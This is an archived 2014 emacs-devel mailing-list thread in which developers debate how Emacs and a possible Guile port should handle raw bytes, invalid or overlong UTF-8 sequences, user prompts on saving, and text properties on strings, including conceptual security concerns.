Our experience with such prompts is that they are perceived as annoyances, no matter whether they happen at read or at write time. > The second was to "replace" these codes with something else. (When? > When reading the file? When writing the file?) Either way it is not > the same as the proposal we are discussing now. This proposal does > not replace any characters. What will Emacs do, under this proposal, if the user is asked whether to keep the original raw bytes and answers NO? I thought Emacs will replace those invalid sequences with something, therefore I reminded what happened last time we tried something similar. Moreover, I think at least some of the suggestions in this thread, perhaps not from you, were not to ask any questions at all, and "handle" these invalid sequences automatically when Emacs reads the text from its source, whatever that is. Under that suggestion, the only reasonable behavior is to replace the invalid sequences with special valid characters, such as u+FFFD, which resembles what we tried doing in the past. > In any case, I hope you are not expecting to hear about user reactions > to any of the proposals that haven't been tried yet. > > That idea did not come from me. YOU said they had already reacted to > THIS proposal. Then my imperfect wording caused your misunderstanding, for which I'm sorry. > What I (and I think also David) > were trying to show is that _similar_ situations were met with user > complaints and outcry, and that we are where we are today because we > heeded to those complaints. > > There are many ways for two different designs to be "similar". They > are also different. The details are crucial for users' reactions. I > think the people who objected to those behaviors, which involved > changing the file contents, might not mind the confirmation much. Well, this is where we disagree, and as I mentioned, such disagreements cannot be reconciled when our degrees of reliance on past experience in similar situations is different. ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-11 7:33 ` Eli Zaretskii @ 2014-10-12 3:22 ` Richard Stallman 2014-10-12 5:22 ` David Kastrup 2014-10-12 5:44 ` Eli Zaretskii 0 siblings, 2 replies; 404+ messages in thread From: Richard Stallman @ 2014-10-12 3:22 UTC (permalink / raw) To: Eli Zaretskii; +Cc: dak, mhw, dmantipov, emacs-devel, handa, monnier, stephen [[[ To any NSA and FBI agents reading my email: please consider ]]] [[[ whether defending the US Constitution against all enemies, ]]] [[[ foreign or domestic, requires you to follow Snowden's example. ]]] > Originally, Emacs would complain that Latin-1 cannot be used, and > asked the user to select a different encoding. > > That is about Latin-1. What did Emacs do, at that time, with UTF-8? The situation I described is with text encodable by UTF-8, but not by Latin-1. So it has no analogue when UTF-8 is used to begin with. It looks like that past case isn't directly pertinent to this issue, then. What will Emacs do, under this proposal, if the user is asked whether to keep the original raw bytes and answers NO? Abort the operation, I suppose. Our experience with such prompts is that they are perceived as annoyances, no matter whether they happen at read or at write time. Maybe so, but how big of an annoyance depends on how often it happens. Those who are arguing for doing something to avoid propagating raw bytes might want to implement an optional feature for asking for confirmation before saving UTF-8 with raw bytes. Then people could try enabling that feature and we would see how often we get asked to confirm. -- Dr Richard Stallman President, Free Software Foundation 51 Franklin St Boston MA 02110 USA www.fsf.org www.gnu.org Skype: No way! That's nonfree (freedom-denying) software. Use Ekiga or an ordinary phone call. ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-12 3:22 ` Richard Stallman @ 2014-10-12 5:22 ` David Kastrup 2014-10-13 3:09 ` Richard Stallman 2014-10-13 3:44 ` Richard Stallman 2014-10-12 5:44 ` Eli Zaretskii 1 sibling, 2 replies; 404+ messages in thread From: David Kastrup @ 2014-10-12 5:22 UTC (permalink / raw) To: Richard Stallman Cc: mhw, dmantipov, emacs-devel, handa, monnier, Eli Zaretskii, stephen Richard Stallman <rms@gnu.org> writes: > [[[ To any NSA and FBI agents reading my email: please consider ]]] > [[[ whether defending the US Constitution against all enemies, ]]] > [[[ foreign or domestic, requires you to follow Snowden's example. ]]] > > > Originally, Emacs would complain that Latin-1 cannot be used, and > > asked the user to select a different encoding. > > > > That is about Latin-1. What did Emacs do, at that time, with UTF-8? > > The situation I described is with text encodable by UTF-8, but not by > Latin-1. So it has no analogue when UTF-8 is used to begin with. > > It looks like that past case isn't directly pertinent to this issue, > then. > > What will Emacs do, under this proposal, if the user is asked whether > to keep the original raw bytes and answers NO? > > Abort the operation, I suppose. It's going to be a wagonload of fun if I do emacsclient `git grep -l some-pattern` in order to edit 30 files and Emacs decides to abort and/or ask each time a comment contains a stray latin-1 character. > Our experience with such prompts is that they are perceived as > annoyances, no matter whether they happen at read or at write time. > > Maybe so, but how big of an annoyance depends on how often it happens. The main point is that annoyance does not serve a purpose. It's like a secretary who refuses to file letters with spelling errors in them. -- David Kastrup ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-12 5:22 ` David Kastrup @ 2014-10-13 3:09 ` Richard Stallman 2014-10-13 3:44 ` Richard Stallman 1 sibling, 0 replies; 404+ messages in thread From: Richard Stallman @ 2014-10-13 3:09 UTC (permalink / raw) To: David Kastrup; +Cc: mhw, dmantipov, emacs-devel, handa, monnier, eliz, stephen [[[ To any NSA and FBI agents reading my email: please consider ]]] [[[ whether defending the US Constitution against all enemies, ]]] [[[ foreign or domestic, requires you to follow Snowden's example. ]]] > What will Emacs do, under this proposal, if the user is asked whether > to keep the original raw bytes and answers NO? > > Abort the operation, I suppose. It's going to be a wagonload of fun if I do emacsclient `git grep -l some-pattern` in order to edit 30 files and Emacs decides to abort and/or ask each time a comment contains a stray latin-1 character. I presume not many of these files will have raw bytes in them if they are in a system that is being properly maintained. But it occurs to me that there could be another option to offer users on such occasions: to convert the raw bytes to Unicode characters assuming that they were meant to be Latin-N (the user can pick the N). -- Dr Richard Stallman President, Free Software Foundation 51 Franklin St Boston MA 02110 USA www.fsf.org www.gnu.org Skype: No way! That's nonfree (freedom-denying) software. Use Ekiga or an ordinary phone call. ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-12 5:22 ` David Kastrup 2014-10-13 3:09 ` Richard Stallman @ 2014-10-13 3:44 ` Richard Stallman 2014-10-13 7:59 ` David Kastrup 1 sibling, 1 reply; 404+ messages in thread From: Richard Stallman @ 2014-10-13 3:44 UTC (permalink / raw) To: David Kastrup; +Cc: mhw, dmantipov, emacs-devel, handa, monnier, eliz, stephen [[[ To any NSA and FBI agents reading my email: please consider ]]] [[[ whether defending the US Constitution against all enemies, ]]] [[[ foreign or domestic, requires you to follow Snowden's example. ]]] > What will Emacs do, under this proposal, if the user is asked whether > to keep the original raw bytes and answers NO? > > Abort the operation, I suppose. It's going to be a wagonload of fun if I do emacsclient `git grep -l some-pattern` in order to edit 30 files and Emacs decides to abort and/or ask each time a comment contains a stray latin-1 character. I presume not many of these files will have raw bytes in them if they are in a system that is being properly maintained. But it occurs to me that there could be another option to offer users on such occasions: to convert the raw bytes to Unicode characters assuming that they were meant to be Latin-N (the user can pick the N). -- Dr Richard Stallman President, Free Software Foundation 51 Franklin St Boston MA 02110 USA www.fsf.org www.gnu.org Skype: No way! That's nonfree (freedom-denying) software. Use Ekiga or an ordinary phone call. ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-13 3:44 ` Richard Stallman @ 2014-10-13 7:59 ` David Kastrup 2014-10-13 8:32 ` Eli Zaretskii 0 siblings, 1 reply; 404+ messages in thread From: David Kastrup @ 2014-10-13 7:59 UTC (permalink / raw) To: Richard Stallman Cc: mhw, dmantipov, emacs-devel, handa, monnier, eliz, stephen Richard Stallman <rms@gnu.org> writes: > [[[ To any NSA and FBI agents reading my email: please consider ]]] > [[[ whether defending the US Constitution against all enemies, ]]] > [[[ foreign or domestic, requires you to follow Snowden's example. ]]] > > > What will Emacs do, under this proposal, if the user is asked whether > > to keep the original raw bytes and answers NO? > > > > Abort the operation, I suppose. > > It's going to be a wagonload of fun if I do > > emacsclient `git grep -l some-pattern` > > in order to edit 30 files and Emacs decides to abort and/or ask each > time a comment contains a stray latin-1 character. > > I presume not many of these files will have raw bytes in them > if they are in a system that is being properly maintained. Like trailing spaces on a line and missing newlines before an end of file and other whitespace errors: any attempt of correcting those automatically or prompting for correcting them when you are just working with material you got from someone else is going to annoy people and cause problems. Syntax highlighting may want to point such things out. That's perfectly fine. But anything that disrupts interactive work is out. I don't want gratuitous random prompts interfering with the operation of keyboard macros, for example. Emacs' current behaviors are the result of dozens of years of user experience and feedback. Our current choices are not random. -- David Kastrup ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-13 7:59 ` David Kastrup @ 2014-10-13 8:32 ` Eli Zaretskii 2014-10-13 9:20 ` David Kastrup 0 siblings, 1 reply; 404+ messages in thread From: Eli Zaretskii @ 2014-10-13 8:32 UTC (permalink / raw) To: David Kastrup; +Cc: rms, mhw, dmantipov, emacs-devel, handa, monnier, stephen > From: David Kastrup <dak@gnu.org> > Cc: eliz@gnu.org, mhw@netris.org, dmantipov@yandex.ru, emacs-devel@gnu.org, handa@gnu.org, monnier@iro.umontreal.ca, stephen@xemacs.org > Date: Mon, 13 Oct 2014 09:59:21 +0200 > > Syntax highlighting may want to point such things out. That's perfectly > fine. Emacs indeed shows raw bytes in a distinct face. ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-13 8:32 ` Eli Zaretskii @ 2014-10-13 9:20 ` David Kastrup 0 siblings, 0 replies; 404+ messages in thread From: David Kastrup @ 2014-10-13 9:20 UTC (permalink / raw) To: Eli Zaretskii; +Cc: rms, mhw, dmantipov, emacs-devel, handa, monnier, stephen Eli Zaretskii <eliz@gnu.org> writes: >> From: David Kastrup <dak@gnu.org> >> Cc: eliz@gnu.org, mhw@netris.org, dmantipov@yandex.ru, >> emacs-devel@gnu.org, handa@gnu.org, monnier@iro.umontreal.ca, >> stephen@xemacs.org >> Date: Mon, 13 Oct 2014 09:59:21 +0200 >> >> Syntax highlighting may want to point such things out. That's perfectly >> fine. > > Emacs indeed shows raw bytes in a distinct face. Which probably comes at some cost. I think at one time it provided some mouse-over information in an overlay and I seem to remember that this overlay may even have been the _whole_ difference between, say, a raw byte 0xa0 and the Unicode character at code point 0xa0. Making this distinction a part of the encoding rather than of a side channel like an overlay seems quite smart to me. Again: the overlay thing is just some vague memory and it might actually have been in either Emacs or XEmacs. At any rate, it would appear to carry a somewhat excessive cost. Syntax highlighting also comes at a cost, but at least it only happens on buffers actually being displayed rather than in the process of strings and buffers employed programmatically. For programmatic use, stray undecodable bytes come at the cost of an additional byte. That's cheap enough to be acceptable in more than just exceptional cases. And I commend Emacs for doing its best for not prescribing my decisions and workflow by making some viable choices unnecessarily expensive or hard. -- David Kastrup ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-12 3:22 ` Richard Stallman 2014-10-12 5:22 ` David Kastrup @ 2014-10-12 5:44 ` Eli Zaretskii 1 sibling, 0 replies; 404+ messages in thread From: Eli Zaretskii @ 2014-10-12 5:44 UTC (permalink / raw) To: rms; +Cc: dak, mhw, dmantipov, emacs-devel, handa, monnier, stephen > Date: Sat, 11 Oct 2014 23:22:59 -0400 > From: Richard Stallman <rms@gnu.org> > CC: dak@gnu.org, mhw@netris.org, dmantipov@yandex.ru, > emacs-devel@gnu.org, handa@gnu.org, monnier@iro.umontreal.ca, > stephen@xemacs.org > > > Originally, Emacs would complain that Latin-1 cannot be used, and > > asked the user to select a different encoding. > > > > That is about Latin-1. What did Emacs do, at that time, with UTF-8? > > The situation I described is with text encodable by UTF-8, but not by > Latin-1. So it has no analogue when UTF-8 is used to begin with. > > It looks like that past case isn't directly pertinent to this issue, > then. I think it _is_ pertinent, because it demonstrates how intolerable Emacs users are to prompts that appear where by their (users') standards Emacs should simply silently DTRT (for some definition of "Right"). > What will Emacs do, under this proposal, if the user is asked whether > to keep the original raw bytes and answers NO? > > Abort the operation, I suppose. Good luck selling this to our users. > Our experience with such prompts is that they are perceived as > annoyances, no matter whether they happen at read or at write time. > > Maybe so, but how big of an annoyance depends on how often it happens. Our experience is that it happens "too often". > Those who are arguing for doing something to avoid propagating raw > bytes might want to implement an optional feature for asking for > confirmation before saving UTF-8 with raw bytes. Then people could > try enabling that feature and we would see how often we get asked to > confirm. Fine by me. ^ permalink raw reply [flat|nested] 404+ messages in thread
[parent not found: <<83r3yg9bpu.fsf@gnu.org>]
* RE: Emacs Lisp's future [not found] ` <<83r3yg9bpu.fsf@gnu.org> @ 2014-10-10 16:02 ` Drew Adams 2014-10-10 16:10 ` Eli Zaretskii 0 siblings, 1 reply; 404+ messages in thread From: Drew Adams @ 2014-10-10 16:02 UTC (permalink / raw) To: Eli Zaretskii, rms Cc: dak, mhw, dmantipov, emacs-devel, handa, monnier, stephen > Visit a file (or receive from another process text) that is > encoded in Latin-1. Insert some text that cannot be encoded in > Latin-1, and try saving the buffer (or sending it to a process). > > Originally, Emacs would complain that Latin-1 cannot be used, and > asked the user to select a different encoding. Then users of UTF-8 > locales complained that these prompts were annoyances, that they > expect Emacs to use UTF-8 silently, without any questions, as long > as UTF-8 can encode the result. So now that is what we do. Is that preference (bother me versus silently change the encoding) under individual-user control? If not, why not create a user option for it? The default behavior can be the current behavior. ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-10 16:02 ` Drew Adams @ 2014-10-10 16:10 ` Eli Zaretskii 0 siblings, 0 replies; 404+ messages in thread From: Eli Zaretskii @ 2014-10-10 16:10 UTC (permalink / raw) To: Drew Adams; +Cc: dak, rms, mhw, dmantipov, emacs-devel, handa, monnier, stephen > Date: Fri, 10 Oct 2014 09:02:09 -0700 (PDT) > From: Drew Adams <drew.adams@oracle.com> > Cc: dak@gnu.org, mhw@netris.org, dmantipov@yandex.ru, emacs-devel@gnu.org, > handa@gnu.org, monnier@iro.umontreal.ca, stephen@xemacs.org > > > Visit a file (or receive from another process text) that is > > encoded in Latin-1. Insert some text that cannot be encoded in > > Latin-1, and try saving the buffer (or sending it to a process). > > > > Originally, Emacs would complain that Latin-1 cannot be used, and > > asked the user to select a different encoding. Then users of UTF-8 > > locales complained that these prompts were annoyances, that they > > expect Emacs to use UTF-8 silently, without any questions, as long > > as UTF-8 can encode the result. So now that is what we do. > > Is that preference (bother me versus silently change the encoding) > under individual-user control? No, not AFAIK. ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-08 0:47 ` Richard Stallman 2014-10-08 7:13 ` Eli Zaretskii @ 2014-10-09 7:36 ` David Kastrup 2014-10-10 14:25 ` Richard Stallman 1 sibling, 1 reply; 404+ messages in thread From: David Kastrup @ 2014-10-09 7:36 UTC (permalink / raw) To: Richard Stallman Cc: mhw, dmantipov, emacs-devel, handa, monnier, eliz, stephen Richard Stallman <rms@gnu.org> writes: > [[[ To any NSA and FBI agents reading my email: please consider ]]] > [[[ whether defending the US Constitution against all enemies, ]]] > [[[ foreign or domestic, requires you to follow Snowden's example. ]]] > > UTF-8 is defined as not containing "overlong" sequences, so Emacs > decodes them into two raw-byte indicating characters, one indicating > 0xC0, one indicating 0xA2. When encoding, it reassembles them into > 0xC0 0xA2. > > In that case, it might be reasonable to ask the user whether to accept > a UTF-8 file decoding that contains any raw-byte characters. > > What do people think of this? > > One problem with that is that quite often Emacs' choice of a coding > system for a buffer is the result of heuristics rather than dependable > information. Not making a fuzz might often be simplest. > > Could you explain what "fuzz" means here? You load a file, edit a line, try saving. Emacs complains that it feels insecure doing so even though the line you edited is perfectly fine. That's getting in the way of doing work. It would be worse if Emacs already prompted for approval when loading. More often than not, the locale applied for operations is not even explicitly specified but a consequence of the user environment or preexisting content. Having internal operations and file read/write fail depending on the state of the user environment is a nuisance. That's particularly a danger when most core developers actually use basic English locales and don't even notice the havoc "locale-awareness" may cause. A recurring phenomenon in that direction is generation of number presentations that can no longer be processed because of being written under the influence of an LC_NUMERIC setting developers did not expect. -- David Kastrup ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-09 7:36 ` David Kastrup @ 2014-10-10 14:25 ` Richard Stallman 0 siblings, 0 replies; 404+ messages in thread From: Richard Stallman @ 2014-10-10 14:25 UTC (permalink / raw) To: David Kastrup; +Cc: mhw, dmantipov, emacs-devel, handa, monnier, eliz, stephen [[[ To any NSA and FBI agents reading my email: please consider ]]] [[[ whether defending the US Constitution against all enemies, ]]] [[[ foreign or domestic, requires you to follow Snowden's example. ]]] > One problem with that is that quite often Emacs' choice of a coding > system for a buffer is the result of heuristics rather than dependable > information. Not making a fuzz might often be simplest. > > Could you explain what "fuzz" means here? You load a file, edit a line, try saving. Emacs complains that it feels insecure doing so even though the line you edited is perfectly fine. Sorry, I do not follow you. Are you proposing a change in current Emacs behavior? If so, what change would that be? A recurring phenomenon in that direction is generation of number presentations that can no longer be processed because of being written under the influence of an LC_NUMERIC setting developers did not expect. I am lost here. Can you present a specific example? Do you have a bug to report? -- Dr Richard Stallman President, Free Software Foundation 51 Franklin St Boston MA 02110 USA www.fsf.org www.gnu.org Skype: No way! That's nonfree (freedom-denying) software. Use Ekiga or an ordinary phone call. ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-07 14:04 ` Richard Stallman 2014-10-07 14:14 ` David Kastrup @ 2014-10-07 14:21 ` Andreas Schwab 1 sibling, 0 replies; 404+ messages in thread From: Andreas Schwab @ 2014-10-07 14:21 UTC (permalink / raw) To: rms Cc: dak, mhw, dmantipov, emacs-devel, handa, monnier, Eli Zaretskii, stephen Richard Stallman <rms@gnu.org> writes: > For > >> example, the ASCII quote (") can be represented as the single byte 0x22, > >> the two byte sequence 0xC0 0xA2, etc. > > What does Emacs do now with a file that contains these "overlong" > sequences? It reads it with them as individual eight-bit chars, if you force it to be decoded as utf-8. Andreas. -- Andreas Schwab, SUSE Labs, schwab@suse.de GPG Key fingerprint = 0196 BAD8 1CE9 1970 F4BE 1748 E4D4 88E3 0EEA B9D7 "And now for something completely different." ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-06 16:27 ` Mark H Weaver 2014-10-06 16:47 ` Eli Zaretskii @ 2014-10-06 19:17 ` Richard Stallman 2014-10-06 19:59 ` David Kastrup 2014-10-07 0:10 ` Mark H Weaver 1 sibling, 2 replies; 404+ messages in thread From: Richard Stallman @ 2014-10-06 19:17 UTC (permalink / raw) To: Mark H Weaver; +Cc: dak, dmantipov, emacs-devel, handa, monnier, eliz, stephen However, I would argue that even in Emacs, string<->bytevector conversions should be strict by default, What is a "bytevector"? It doesn't appear in the Emacs Lisp ref manual, so I suppose it is a concept from Scheme. How would it relate into Emacs? Maybe your suggestion is a good one. It doesn't matter how these raw bytes are encoded internally. No matter what mechanism we use to accomplish it, propagating invalid byte sequences by default is bad security policy. As a general matter, the policy that programs should not get upset when they see invalid UTF-8 seems more secure than the policy that programs should not propagate invalid UTF-8. But, given the situation, it isn't useful to debate that theoretical question. -- Dr Richard Stallman President, Free Software Foundation 51 Franklin St Boston MA 02110 USA www.fsf.org www.gnu.org Skype: No way! That's nonfree (freedom-denying) software. Use Ekiga or an ordinary phone call. ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-06 19:17 ` Richard Stallman @ 2014-10-06 19:59 ` David Kastrup 2014-10-07 0:10 ` Mark H Weaver 1 sibling, 0 replies; 404+ messages in thread From: David Kastrup @ 2014-10-06 19:59 UTC (permalink / raw) To: Richard Stallman Cc: Mark H Weaver, dmantipov, emacs-devel, handa, monnier, eliz, stephen Richard Stallman <rms@gnu.org> writes: > However, I would argue that even in Emacs, string<->bytevector > conversions should be strict by default, > > What is a "bytevector"? It doesn't appear in the Emacs Lisp > ref manual, so I suppose it is a concept from Scheme. > How would it relate into Emacs? Maybe your suggestion is a good one. Unibyte string minus the string part. Basically what decoding works from to generate strings and vice versa. But in GUILE, you cannot use string functions on them: they are basically arrays with byte elements. -- David Kastrup ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-06 19:17 ` Richard Stallman 2014-10-06 19:59 ` David Kastrup @ 2014-10-07 0:10 ` Mark H Weaver 2014-10-07 14:04 ` Richard Stallman 1 sibling, 1 reply; 404+ messages in thread From: Mark H Weaver @ 2014-10-07 0:10 UTC (permalink / raw) To: Richard Stallman Cc: dak, dmantipov, emacs-devel, handa, monnier, eliz, stephen Richard Stallman <rms@gnu.org> writes: > However, I would argue that even in Emacs, string<->bytevector > conversions should be strict by default, > > What is a "bytevector"? Bytevectors are packed arrays of unsigned integers < 256. It is the standard Scheme data type for performing binary I/O. String operations deliberately do not work on them. In contrast, strings are packed arrays of characters, which in Scheme are not integers but rather an abstract type representing Unicode code points. > How would it relate into Emacs? Maybe your suggestion is a good one. Implicit string<->bytevector conversions are needed almost every time a string is passed to/from the C world, since most C APIs are based on bytes not Unicode characters. This includes I/O, command-line arguments and environment variables (whether reading the ones given to us or passing new ones down to subprocesses), POSIX file names, interfacing with most C libraries, etc. My suggestion is that these implicit conversions should be strict by default. IMO, only in specific cases (most notably when editing a file) should invalid byte sequences by accepted, produced, or propagated. The reasons are (1) to protect internal subsystems (subprocesses, C functions linked with Guile, etc) from invalid input such as overlong encodings, and (2) to catch errors early rather than silently producing garbage in the face of programming errors. However, it is of course up to the Emacs community to decide when conversions should be strict. Guile can provide both modes of operation. Mark ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-07 0:10 ` Mark H Weaver @ 2014-10-07 14:04 ` Richard Stallman 0 siblings, 0 replies; 404+ messages in thread From: Richard Stallman @ 2014-10-07 14:04 UTC (permalink / raw) To: Mark H Weaver; +Cc: dak, dmantipov, emacs-devel, handa, monnier, eliz, stephen [[[ To any NSA and FBI agents reading my email: please consider ]]] [[[ whether defending the US Constitution against all enemies, ]]] [[[ foreign or domestic, requires you to follow Snowden's example. ]]] My suggestion is that these implicit conversions should be strict by default. I see no problem with that. -- Dr Richard Stallman President, Free Software Foundation 51 Franklin St Boston MA 02110 USA www.fsf.org www.gnu.org Skype: No way! That's nonfree (freedom-denying) software. Use Ekiga or an ordinary phone call. ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-06 6:21 ` Mark H Weaver 2014-10-06 15:08 ` Eli Zaretskii @ 2014-10-11 18:34 ` Florian Weimer 1 sibling, 0 replies; 404+ messages in thread From: Florian Weimer @ 2014-10-11 18:34 UTC (permalink / raw) To: Mark H Weaver Cc: dak, rms, dmantipov, emacs-devel, handa, monnier, eliz, stephen * Mark H. Weaver: > To give an example, consider a procedure that needs to pass a string > from an untrusted source to an SQL query. To do this safely, it needs > to quote the string. I haven't researched how to properly quote SQL > string literals, but in general, quoting is typically done by > recognizing some set of special characters that must be escaped, and > allowing all other characters through unmodified. For are truly robust solution, you need parameterized queries. Most database servers support other encodings besides UTF-8, and the required quoting logic can be quite complicated. > However, "raw byte" code points can be used to bypass such a quoting > mechanism, and thus send an unescaped closing quote to the SQL database > followed by arbitrary SQL commands. This can happen with certain multi-byte character sets as well. > UTF-8 decoders are supposed to detect and reject these "overlong" > encodings, but it is likely that many programs fail to do this. That's not very common anymore. > To cope with this, the Unicode standards require that UTF-8 codecs > reject overlong encodings and other invalid byte sequences. This is in > direct conflict with the idea of "raw byte" code points, whose purpose > is to be tolerant of arbitrary byte sequences and to propagate them > unchanged. The charset conversion functionality could support binary-transparent UTF-8 and pure UTF-8 at output boundaries. This way, the application can make a choice. ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-05 7:53 ` Mark H Weaver ` (2 preceding siblings ...) 2014-10-05 21:49 ` Richard Stallman @ 2014-10-05 21:49 ` Richard Stallman 2014-10-06 3:34 ` Stephen J. Turnbull 2014-10-10 20:41 ` Mark H Weaver 3 siblings, 2 replies; 404+ messages in thread From: Richard Stallman @ 2014-10-05 21:49 UTC (permalink / raw) To: Mark H Weaver; +Cc: dak, dmantipov, emacs-devel, handa, monnier, eliz, stephen [[[ To any NSA and FBI agents reading my email: please consider ]]] [[[ whether defending the US Constitution against all enemies, ]]] [[[ foreign or domestic, requires you to follow Snowden's example. ]]] Supporting property lists in Scheme raises difficult questions Do you mean text properties in strings, as in Emacs Lisp? These are more complicated than an ordinary property list on an object as a whole. such as: * What should the Scheme procedures 'string=?' and 'equal?' do when comparing two strings with the equal character sequences but unequal property lists? * Should Scheme procedures such as 'substring', 'string-append', 'string-upcase', etc, propagate the associated property list data? * What should Scheme's 'write' do when applied to a string that includes a property list? ('write' is analogous to 'prin1'). The obvious first suggestion is to handle each one as Emacs Lisp does. For printing, a different syntax might be needed to fit in with Scheme printed representation conventions, but that is ok. * Are there security implications to carrying around and possibly propagating (via Scheme's "substring") extra information that is effectively invisible to all procedures that have ever been available in Scheme? There are many ways to pass data from one piece of Scheme code to another. Is there any real, usable "security" now, that this would reduce? Can you give an example? Given a self-contained Scheme program, it should be easy to determine whether it ever examines or sets string text properties. Is that enough to provide the same "security" benefits in practice? -- Dr Richard Stallman President, Free Software Foundation 51 Franklin St Boston MA 02110 USA www.fsf.org www.gnu.org Skype: No way! That's nonfree (freedom-denying) software. Use Ekiga or an ordinary phone call. ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-05 21:49 ` Richard Stallman @ 2014-10-06 3:34 ` Stephen J. Turnbull 2014-10-08 0:48 ` Richard Stallman 2014-10-10 20:41 ` Mark H Weaver 1 sibling, 1 reply; 404+ messages in thread From: Stephen J. Turnbull @ 2014-10-06 3:34 UTC (permalink / raw) To: rms; +Cc: dak, Mark H Weaver, dmantipov, emacs-devel, handa, monnier, eliz Richard Stallman writes: > Given a self-contained Scheme program, it should be easy to determine > whether it ever examines or sets string text properties. Is that enough > to provide the same "security" benefits in practice? No. Often systems are constructed by assembling separately developed modules. If a "security" module responsible for checking data validity is property-oblivious, then maliciously crafted properties may be able to cause "evil" behavior in a property-sensitive module supposedly protected by the "security" module. This kind of problem is often exposed when the "security" module was designed for a Scheme version without some feature (here "string properties"), and the infrastructure is updated to an interpreter version with the feature. You can impugn the skills of the programmers responsible, or say it's all very hypothetical (which I admit, not being a cracker myself I don't know how to turn such configurations into actual exploits), but this is a common pattern for security breaches. It's a great service to the Internet community for the Guile developers to worry about it and at least document the issues faced when using Guile. ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-06 3:34 ` Stephen J. Turnbull @ 2014-10-08 0:48 ` Richard Stallman 2014-10-08 2:09 ` Stephen J. Turnbull 0 siblings, 1 reply; 404+ messages in thread From: Richard Stallman @ 2014-10-08 0:48 UTC (permalink / raw) To: Stephen J. Turnbull Cc: dak, mhw, dmantipov, emacs-devel, handa, monnier, eliz [[[ To any NSA and FBI agents reading my email: please consider ]]] [[[ whether defending the US Constitution against all enemies, ]]] [[[ foreign or domestic, requires you to follow Snowden's example. ]]] > Given a self-contained Scheme program, it should be easy to determine > whether it ever examines or sets string text properties. Is that enough > to provide the same "security" benefits in practice? No. Often systems are constructed by assembling separately developed modules. If a "security" module responsible for checking data validity is property-oblivious, then maliciously crafted properties may be able to cause "evil" behavior in a property-sensitive module supposedly protected by the "security" module. I don't understand what sort of danger you're worried about. Can you present a concrete scenario? You can impugn the skills of the programmers responsible, That comes from you, not from me. or say it's all very hypothetical It is all very abstract as well as hypothetical. If you want to convince me that this is a problem, you need to present sufficient arguments to outweigh the very clear problem that would be caused by NOT adding property lists to strings. You need to convice me that it makes sense to try to prevent communication between two Scheme programs in the same process. -- Dr Richard Stallman President, Free Software Foundation 51 Franklin St Boston MA 02110 USA www.fsf.org www.gnu.org Skype: No way! That's nonfree (freedom-denying) software. Use Ekiga or an ordinary phone call. ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-08 0:48 ` Richard Stallman @ 2014-10-08 2:09 ` Stephen J. Turnbull 2014-10-08 3:07 ` David Kastrup 2014-10-09 1:19 ` Richard Stallman 0 siblings, 2 replies; 404+ messages in thread From: Stephen J. Turnbull @ 2014-10-08 2:09 UTC (permalink / raw) To: rms; +Cc: dak, mhw, dmantipov, emacs-devel, handa, monnier, eliz Richard Stallman writes: > If you want to convince me that [a property list vector for > implicitly transmitting information across module boundaries] is a > problem, I'm not trying to convince you; your evidentiary requirements are way too high for me to satisfy in time available. I just want to make sure that Emacs developers in general are aware that if string properties are added to Guile itself, Emacs will be a potential vector for attacks. For example, by providing a "back channel" for malicious information if Emacs is used to develop a management interface for a web service written in Guile which directly accesses Guile modules used in the web service. > you need to present sufficient arguments to outweigh the very clear > problem that would be caused by NOT adding property lists to > strings. You misunderstand me. Emacs obviously needs property lists on strings. Nobody in their right mind would suggest otherwise. What I advocate is that string properties should be implemented by using Guile facilities for defining types, not by changing Guile. External modules that want to use Emacs property lists for whatever reason can explicitly import that interface from Emacs. However, those properties should not be passed to non-Emacs modules implicitly. ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-08 2:09 ` Stephen J. Turnbull @ 2014-10-08 3:07 ` David Kastrup 2014-10-09 3:06 ` Stephen J. Turnbull 2014-10-09 1:19 ` Richard Stallman 1 sibling, 1 reply; 404+ messages in thread From: David Kastrup @ 2014-10-08 3:07 UTC (permalink / raw) To: Stephen J. Turnbull Cc: rms, mhw, dmantipov, emacs-devel, handa, monnier, eliz "Stephen J. Turnbull" <stephen@xemacs.org> writes: > Richard Stallman writes: > > > If you want to convince me that [a property list vector for > > implicitly transmitting information across module boundaries] is a > > problem, > > I'm not trying to convince you; your evidentiary requirements are way > too high for me to satisfy in time available. Newsflash: Emacs 19 has been released in the mean time. That's good since we have an example we can study now with regard to the problems text properties may cause. -- David Kastrup ^ permalink raw reply [flat|nested] 404+ messages in thread
